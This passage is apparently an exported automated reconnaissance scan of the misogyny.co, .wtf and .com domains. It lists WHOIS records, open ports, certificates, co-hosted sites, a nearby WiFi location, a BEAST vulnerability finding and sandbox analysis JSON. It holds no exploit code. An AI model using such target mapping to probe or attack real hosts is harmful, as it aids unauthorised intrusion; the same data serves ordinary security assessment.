2018-03-07T07:39:37.84Z Registrar Registration Expiration Date: 2023-03-07T07:39:37.84Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: ok https://icann.org/epp#ok Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 46710fa45d0846bc845a969a73e8377e.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 46710fa45d0846bc845a969a73e8377e.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 46710fa45d0846bc845a969a73e8377e.protect@withheldforprivacy.com Name Server: ns1.dan.com Name Server: ns2.dan.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T03:41:01.74Z <<< For more information on Whois status codes, please visit https://icann.org/epp misogyny.co 2022-12-18 00:20:42 BGP AS Membership No Censys 0 0 1 0 None 8075 4.228.83.86 2022-12-18 00:22:07 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Connection": "DISPLAY_UTF8"}, "Connection": ["close"]} 34.149.204.188 2022-12-18 00:21:06 Open TCP Port No Censys 0 0 2 0 None 172.67.147.230:2086 172.67.147.230 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet55FA (Net ID: 00:01:36:59:55:F8) 37.7803446,-122.3906132 2022-12-18 00:11:20 Vulnerability - CVE Medium Yes Tool - testssl.sh 0 1 2 0 None CVE-2011-3389 https://nvd.nist.gov/vuln/detail/CVE-2011-3389 Score: 4.3 Description: The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack. 188.114.97.1 2022-12-18 00:36:38 Malicious Affiliate IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [81.88.52.239] https://www.virustotal.com/en/ip-address/81.88.52.239/information/ 81.88.52.239 2022-12-18 00:16:37 Physical Location No numverify 0 0 3 0 None FR +33892556677 2022-12-18 00:06:13 SSL Certificate - Raw Data No Certificate Transparency 0 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:3b:c1:da:8c:2d:8d:3c:49:c8:fb:3d:44:b5:c2:87:b4:3a Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Sep 20 20:09:20 2022 GMT Not After : Dec 19 20:09:19 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:9e:35:88:49:0b:b7:05:fb:30:39:91:2c:a4:c8: 3d:37:20:a3:92:d0:d2:11:82:4f:c7:bd:e3:16:9d: be:3d:3f:14:1f:c4:fd:44:00:d3:22:0e:0a:15:80: 32:c2:39:da:b8:ae:34:4f:14:01:a5:16:f7:6e:eb: 30:0a:c1:cc:d2 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 88:24:DF:9C:20:E2:63:56:23:30:02:EA:37:31:97:44:FC:90:64:46 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 41:C8:CA:B1:DF:22:46:4A:10:C6:A1:3A:09:42:87:5E: 4E:31:8B:1B:03:EB:EB:4B:C7:68:F0:90:62:96:06:F6 Timestamp : Sep 20 21:09:20.492 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:4B:FA:2E:39:B5:4A:7E:1E:99:95:86:B9: B3:8A:E4:80:9D:CD:AB:17:D7:B7:40:4F:C3:9B:ED:54: 24:9C:11:BD:02:21:00:FD:45:FB:F2:A1:3E:CD:E8:A2: CC:34:29:02:72:8C:EB:99:C0:CA:A0:21:99:F7:A1:5B: C1:74:A7:32:F7:42:7F Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:79:BE:F0:9E:39:39:21:F0:56:73:9F:63:A5:77:E5: BE:57:7D:9C:60:0A:F8:F9:4D:5D:26:5C:25:5D:C7:84 Timestamp : Sep 20 21:09:20.448 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:FC:14:96:0B:ED:FC:D9:C5:2A:9E:6F: 52:EE:C7:06:D0:67:B9:01:DA:56:7D:5C:92:2F:10:76: DF:F1:5D:90:3E:02:21:00:B4:D1:00:98:21:12:BC:2A: 54:52:F2:E6:8B:33:79:69:58:57:C6:67:70:5C:DA:3B: E7:67:04:E5:84:09:7B:A8 Signature Algorithm: ecdsa-with-SHA384 30:64:02:30:0c:9f:02:9e:a6:3f:cd:3b:85:32:2b:49:96:f2: 00:58:fd:40:65:de:b9:94:b5:11:ef:8a:23:0c:07:ec:f5:75: 18:07:07:24:15:e7:ea:8b:b4:36:77:75:83:eb:b0:3e:02:30: 2d:3e:43:61:54:0c:77:dc:17:fe:4d:45:de:d3:ad:b2:35:a2: 15:2e:45:32:25:68:c3:f7:9c:53:f8:b9:69:7b:8a:0e:27:5e: 8e:8c:9c:98:c5:ad:33:67:02:7f:98:09 misogyny.wtf 2022-12-18 00:21:30 Open TCP Port No Censys 0 0 2 0 None 172.67.190.129:2082 172.67.190.129 2022-12-18 00:18:30 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-313-183.w90-116.abo.wanadoo.fr 90.116.149.183 2022-12-18 00:21:09 Software Used Yes Censys 0 0 2 0 None CloudFlare CloudFlare Load Balancer 188.114.96.0 2022-12-18 00:07:17 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'172.67.169.215'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://etl.am/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3520"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_dc0_IE_EarlyTabStart_0x4d4_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_dc0_ConnHashTable<3520>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_dc0_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_dc0_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_dc0_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-72', u'name': u'Overview of unique CLSIDs touched in registry', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" touched "MSAA AccPropServices" (Path: "HKCU\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}")\n "iexplore.exe" touched "Task Bar Communication" (Path: "HKCU\\CLSID\\{56FDF344-FD6D-11D0-958A-006097C9A090}\\TREATAS")\n "iexplore.exe" touched "Internet Explorer(Ver 1.0)" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{0002DF01-0000-0000-C000-000000000046}\\INPROCHANDLER")\n "iexplore.exe" touched "WebBrowserHandler Proxy" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{3CB169B3-17D9-4E47-8B93-2878998F69A2}\\PROGID")\n "iexplore.exe" touched "PSDispatch" (Path: "HKCU\\CLSID\\{00020420-0000-0000-C000-000000000046}\\TREATAS")\n "iexplore.exe" touched "Computer" (Path: "HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER")\n "iexplore.exe" touched "Memory Mapped Cache Mgr" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\PROGID")\n "iexplore.exe" touched "UsersFiles" (Path: "HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER")\n "iexplore.exe" touched "Shockwave Flash Object" (Path: "HKCU\\CLSID\\{D27CDB6E-AE6D-11CF-96B8-444553540000}\\INPROCSERVER32")\n "iexplore.exe" touched "Property System Both Class Factory" (Path: "HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\INPROCSERVER32")\n "iexplore.exe" touched "Security Manager" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS")\n "iexplore.exe" touched "PSFactoryBuffer" (Path: "HKCU\\CLSID\\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\\INPROCSERVER32")\n "iexplore.exe" touched "Network List Manager" (Path: "HKCU\\CLSID\\{A47979D2-C419-11D9-A5B4-001185AD2B89}\\LOCALSERVER32")\n "iexplore.exe" touched "Cor MIME Filter, CorFltr, CorFltr 1" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{1E66F26B-79EE-11D2-8710-00C04F79ED0D}\\SERVER")\n "iexplore.exe" touched "WinInetBroker Class" (Path: "HKCU\\CLSID\\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\\TREATAS")\n "iexplore.exe" touched "NetworkListManager" (Path: "HKCU\\CLSID\\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\\INPROCSERVER32")\n "iexplore.exe" touched "DAO.TableDef.36" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00000103-0000-0010-8000-00AA006D2EA4}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")\n "iexplore.exe" touched "DAO.Field.36" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00000104-0000-0010-8000-00AA006D2EA4}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")\n "iexplore.exe" touched "DAO.Index.36" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00000105-0000-0010-8000-00AA006D2EA4}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")\n "iexplore.exe" touched "DAO.Relation.36" (Path: "HKLM\\SOFTWARE\\CLASSES\\CLSID\\{00000109-0000-0010-8000-00AA006D2EA4}\\IMPLEMENTED CATEGORIES\\{00021493-0000-0000-C000-000000000046}")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ocsp.pki.goog"\n "cacerts.digicert.com"\n "etl.am"\n "fonts.googleapis.com"\n "fonts.gstatic.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.67.169.215:443"\n "142.250.72.234:443"\n "142.250.72.227:80"\n "142.250.72.227:443"\n "104.18.11.39:80"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"\n "great-bg-3_1_.png" has type "PNG image data 1844 x 253 8-bit/color RGB non-interlaced"\n "settings_1_.css" has type "ASCII text with very long lines with no line terminators"\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"\n "admin-bar-style_1_.css" has type "ASCII text with no line terminators"\n "KFOjCnqEu92Fr1Mu51S7ACc0CsI_1_.woff" has type "Web Open Font Format flavor 65536 length 31136 version 1.1"\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"\n "~DF7BF99906647D5B3C.TMP" has type "data"\n "KFOjCnqEu92Fr1Mu51TzBic0CsI_1_.woff" has type "Web Open Font Format flavor 65536 length 30772 version 1.1"\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"\n "KFOlCnqEu92Fr1MmWUlfChc-_1_.woff" has type "Web Open Font Format flavor 65536 length 28924 version 1.1"\n "jquery.fancybox.pack_1_.js" has type "ASCII text with very long lines"\n "memQYaGs126MiZpBA-UFUIcVXSCEkx2cmqvXlWq8tWZ0Pw86hd0Rk8ZkWV4exg_1_.woff" has type "Web Open Font Format flavor 65536 length 29256 version 1.1"\n "jquery.fancybox_1_.css" has type "ASCII text with very long lines with no line terminators"\n "3C428B1A3E5F57D887EC4B864FAC5DCC" has type "data"\n "style.min_1_.css" has type "ASCII text with very long lines"\n "strocke-gap-icons-style_1_.css" has type "ASCII text with very long lines with no line terminators"\n "KFOlCnqEu92Fr1MmEU9fChc-_1_.woff" has type "Web Open Font Format flavor 65536 length 28920 version 1.1"\n "isotope.pkgd.min_1_.js" has type "ASCII text with very long lines"'}, {u'category': u'Environment Awareness', u'origin': u'Registry Access', u'identifier': u'registry-55', u'name': u'Reads the registry for installed applications', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\IEXPLORE.EXE")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\IEXPLORE.EXE"; Key: "DONTUSEDESKTOPCHANGEROUTER")\n "iexplore.exe" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\IEXPLORE.EXE")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\OUTLOOK.EXE"; Key: "PATH")\n "iexplore.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\OUTLOOK.EXE")'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://etl.am/"\n Pattern match: "https://etl.am"\n Heuristic match: "cacerts.digicert.com"\n Heuristic match: "GET /DigiCertGlobalRootG2.crt HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: cacerts.digicert.com"\n Heuristic match: "etl.am"\n Heuristic match: "fonts.googleapis.com"\n Heuristic match: "fonts.gstatic.com"\n Pattern match: "http://ns.adobe.com/xap/1.0/"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n Pattern match: "http://ns.adobe.c"\n Pattern match: "https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"\n Pattern match: "\nL.pP/"\n Heuristic match: "v>qWk$|%9bZ^34r7rWGGl+U?\\K+|u{\n__#lwtI\'{7\n>pv89KDOlmIacm%a-?2V4[S4uGP\'Bd f+RC0JifW6}6;Y*O[UL1?MzI7"'}, {u'category': u'Exploit/Shellcode', u'origin': u'Registry Access', u'identifier': u'registry-65', u'name': u'Reads the Equation Editor Class Identifier (CLSID)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None 172.67.169.215 2022-12-18 00:04:28 Affiliate - Internet Name No DNS Raw Records 2 0 1 0 None dns2.registrar-servers.com misogyny.wtf 2022-12-18 00:14:01 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.138:80 188.114.96.0/24 2022-12-18 00:21:13 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["77ae523eff6ee12f-ORD"]} 188.114.97.0 2022-12-18 00:06:31 Company Name No Company Name Extractor 0 0 3 0 None Cloudflare\, Inc. C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 2022-12-18 00:06:06 Similar Domain Yes Tool - DNSTwist 1 0 1 0 None rasputin.fr rasputain.fr 2022-12-18 00:09:54 Co-Hosted Site No HackerTarget 0 0 2 0 None buf-noodles.ga 172.67.147.230 2022-12-18 00:41:03 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@godaddy.com Domain Name: MISOGYNY.COM Registry Domain ID: 1499316_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.godaddy.com Registrar URL: http://www.godaddy.com Updated Date: 2022-12-07T13:26:32Z Creation Date: 1998-01-24T05:00:00Z Registry Expiry Date: 2024-01-04T04:59:59Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: 480-624-2505 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Name Server: NS3.AFTERNIC.COM Name Server: NS4.AFTERNIC.COM DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:40:42Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: misogyny.com Registry Domain ID: 1499316_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.godaddy.com Registrar URL: https://www.godaddy.com Updated Date: 2022-12-07T08:26:30Z Creation Date: 1998-01-24T00:00:00Z Registrar Registration Expiration Date: 2024-01-03T23:59:59Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Registry Registrant ID: Not Available From Registry Registrant Name: Registration Private Registrant Organization: Domains By Proxy, LLC Registrant Street: DomainsByProxy.com Registrant Street: 2155 E Warner Rd Registrant City: Tempe Registrant State/Province: Arizona Registrant Postal Code: 85284 Registrant Country: US Registrant Phone: +1.4806242599 Registrant Phone Ext: Registrant Fax: +1.4806242598 Registrant Fax Ext: Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=misogyny.com Registry Admin ID: Not Available From Registry Admin Name: Registration Private Admin Organization: Domains By Proxy, LLC Admin Street: DomainsByProxy.com Admin Street: 2155 E Warner Rd Admin City: Tempe Admin State/Province: Arizona Admin Postal Code: 85284 Admin Country: US Admin Phone: +1.4806242599 Admin Phone Ext: Admin Fax: +1.4806242598 Admin Fax Ext: Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=misogyny.com Registry Tech ID: Not Available From Registry Tech Name: Registration Private Tech Organization: Domains By Proxy, LLC Tech Street: DomainsByProxy.com Tech Street: 2155 E Warner Rd Tech City: Tempe Tech State/Province: Arizona Tech Postal Code: 85284 Tech Country: US Tech Phone: +1.4806242599 Tech Phone Ext: Tech Fax: +1.4806242598 Tech Fax Ext: Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=misogyny.com Name Server: NS3.AFTERNIC.COM Name Server: NS4.AFTERNIC.COM DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:41:02Z <<< For more information on Whois status codes, please visit https://icann.org/epp TERMS OF USE: The data contained in this registrar's Whois database, while believed by the registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its accuracy. This information is provided for the sole purpose of assisting you in obtaining information about domain name registration records. Any use of this data for any other purpose is expressly forbidden without the prior written permission of this registrar. By submitting an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not to use this data to allow, enable, or otherwise support the dissemination or collection of this data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone, postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations of any kind, including spam. You further agree not to use this data to enable high volume, automated or robotic electronic processes designed to collect or compile this data for any purpose, including mining this data for your own personal or commercial purposes. Failure to comply with these terms may result in termination of access to the Whois database. These terms may be subject to modification at any time without notice. 2022-12-18 00:28:11 Similar Domain - Whois No Whois 1 0 2 0 None % TCI Whois Service. Terms of use: % https://tcinet.ru/documents/whois_ru_rf.pdf (in Russian) % https://tcinet.ru/documents/whois_su.pdf (in Russian) domain: PLAGUE.SU nserver: ns2.fastnic.ru. nserver: ns.fastnic.ru. state: REGISTERED, DELEGATED person: Private Person e-mail: plague@koptevo.net registrar: REGRU-SU created: 2010-03-25T18:09:23Z paid-till: 2023-03-25T18:09:23Z free-date: 2023-04-27 source: TCI Last updated on 2022-12-18T00:26:30Z plague.su 2022-12-18 00:21:34 Raw Data from RIRs No Censys 0 0 2 0 None {"last_updated_at": "2022-12-17T23:07:37.915Z", "ip": "104.21.19.243", "location_updated_at": "2022-12-14T07:44:38.029234Z", "autonomous_system_updated_at": "2022-12-09T05:03:02.793710Z", "location": {"coordinates": {"latitude": 0.0, "longitude": 0.0}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "", "country_code": "", "timezone": ""}, "dns": {"records": {"jrsosa.net": {"record_type": "A", "resolved_at": "2022-12-07T16:23:31.713231403Z"}, "casinoslotoyunlari.bioref.org": {"record_type": "A", "resolved_at": "2022-11-19T16:18:27.786691235Z"}, "isfepiprilishe.tk": {"record_type": "A", "resolved_at": "2022-12-12T00:51:53.807634064Z"}, "greenmerbackbin.tk": {"record_type": "A", "resolved_at": "2022-12-08T20:04:58.593150346Z"}, "anxiety-aid-guide.live": {"record_type": "A", "resolved_at": "2022-11-30T15:23:30.960264013Z"}, "avidanhandmade.com": {"record_type": "A", "resolved_at": "2022-12-04T13:00:16.823372796Z"}, "miloszniedzielski.pl": {"record_type": "A", "resolved_at": "2022-12-01T16:45:55.172558210Z"}, "www.auto-zentrum.al": {"record_type": "A", "resolved_at": "2022-12-10T12:04:55.821554125Z"}, "www.hythesolutions.com.cdn.cloudflare.net": {"record_type": "A", "resolved_at": "2022-12-02T16:02:08.115754512Z"}, "dextragames.com": {"record_type": "A", "resolved_at": "2022-12-04T13:19:26.338465224Z"}, "dibbbacasipoka.ml": {"record_type": "A", "resolved_at": "2022-11-22T16:03:58.608292633Z"}, "netherlands-dedicated.com": {"record_type": "A", "resolved_at": "2022-11-27T13:36:45.994782676Z"}, "www.eskisehirescortol.net": {"record_type": "A", "resolved_at": "2022-11-29T17:19:25.591007856Z"}, "www.designsbysuzie.com": {"record_type": "A", "resolved_at": "2022-11-23T15:52:48.157800815Z"}, "mail.worldofwarcraftdating.site": {"record_type": "A", "resolved_at": "2022-11-25T17:18:30.899764295Z"}, "mansix.net": {"record_type": "A", "resolved_at": "2022-10-13T09:23:32.675728636Z"}, "grupopaulabellotti.com.br": {"record_type": "A", "resolved_at": "2022-12-05T22:47:25.232040143Z"}, "rouzzz.tk": {"record_type": "A", "resolved_at": "2022-11-27T16:33:19.875741780Z"}, "abruspowolfcmomel.cf": {"record_type": "A", "resolved_at": "2022-12-17T12:28:41.016811950Z"}, "goshoppingtrend.com": {"record_type": "A", "resolved_at": "2022-11-29T13:23:03.175295575Z"}, "rodaqui.com.br": {"record_type": "A", "resolved_at": "2022-11-28T12:13:01.880514256Z"}, "dvicadmephenmai.tk": {"record_type": "A", "resolved_at": "2022-11-19T16:35:03.238347876Z"}, "torri.pl": {"record_type": "A", "resolved_at": "2022-12-11T08:23:49.046212456Z"}, "helicoptervaishnodevi.co.in": {"record_type": "A", "resolved_at": "2022-12-11T14:58:49.822937820Z"}, "bucktabor.tk": {"record_type": "A", "resolved_at": "2022-12-11T16:54:58.895796177Z"}, "pixiebear.com": {"record_type": "A", "resolved_at": "2022-12-01T13:52:21.981430939Z"}, "dharcitisimott.cf": {"record_type": "A", "resolved_at": "2022-11-29T12:31:04.538950011Z"}, "www.forestcityheating.eu.org": {"record_type": "A", "resolved_at": "2022-12-04T17:00:04.203577576Z"}, "czasvodtaigor.cf": {"record_type": "A", "resolved_at": "2022-12-03T12:31:28.723371551Z"}, "coutupalimuldo.gq": {"record_type": 